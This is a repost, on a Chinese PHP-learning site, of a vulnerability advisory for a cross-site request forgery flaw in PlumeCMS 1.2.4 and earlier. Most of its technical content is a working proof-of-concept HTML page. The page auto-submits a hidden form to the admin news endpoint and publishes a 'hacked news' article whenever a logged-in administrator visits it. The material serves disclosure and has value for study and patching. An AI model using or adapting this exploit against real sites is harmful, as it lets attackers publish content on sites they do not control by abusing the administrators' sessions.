来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: PlumeCMS = 1.2.4 CSRF Vulnerability作者: Ivano Binetti (http://ivanobinetti.com)下载地址: http://sourceforge.net/projects/pxsystem/files/latest/download?source=directory开发网站: ......
标题: PlumeCMS <= 1.2.4 CSRF Vulnerability
作者: Ivano Binetti (http://ivanobinetti.com) 下载地址: http://sourceforge.net/projects/pxsystem/files/latest/download?source=directory 开发网站: http://pxsystem.sourceforge.net/ 影响版本: 1.2.4 最新版及更低版本 测试系统: Debian Squeeze (6.0) [Insert and publish NEWS by Ivano Binetti] Summary 1)缺陷描述 2)测试 1)缺陷描述 PlumeCMS is prone to a CSRF Vulnerability which allows an attacker to insert and publish "News" (as PlumeCMS names his articles) when an authenticated admin browses a web page containing the following html/javascript code. 2)测试 <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add and publish News</H2> <form method="POST" name="form0" action="http://www.2cto.com /plume/manager/news.php"> <input type="hidden" name="n_category_id" value="1"/> <input type="hidden" name="n_content_format" value="html"/> <input type="hidden" name="n_status" value="1"/> <input type="hidden" name="n_comment_support" value="1"/> <input type="hidden" name="n_subtype" value="2"/> <input type="hidden" name="n_title" value="hacked news"/> <input type="hidden" name="n_content" value="%3Cp%3Etest2%3C%2Fp%3E"/> <input type="hidden" name="n_subject" value=""/> <input type="hidden" name="n_titlewebsite" value=""/> <input type="hidden" name="n_linkwebsite" value=""/> <input type="hidden" name="publish" value="Save+%5Bs%5D"/> </form> </body> </html> |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com